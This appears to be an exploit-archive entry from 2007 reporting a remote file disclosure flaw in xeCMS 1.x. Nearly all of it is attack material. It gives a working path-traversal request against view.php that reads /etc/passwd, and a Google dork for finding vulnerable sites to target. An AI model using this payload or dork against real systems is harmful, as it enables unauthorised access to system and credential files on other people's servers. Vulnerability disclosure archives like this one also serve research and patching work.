id: 2378
date: 12/19/2007
title: xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability
author: p4imi0
cves: 

==============================================================
xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability
==============================================================



--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://xecms.sunsite.dk/
author      : p4imi0
exploit     : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS



#  0day.today [2023-03-26]  #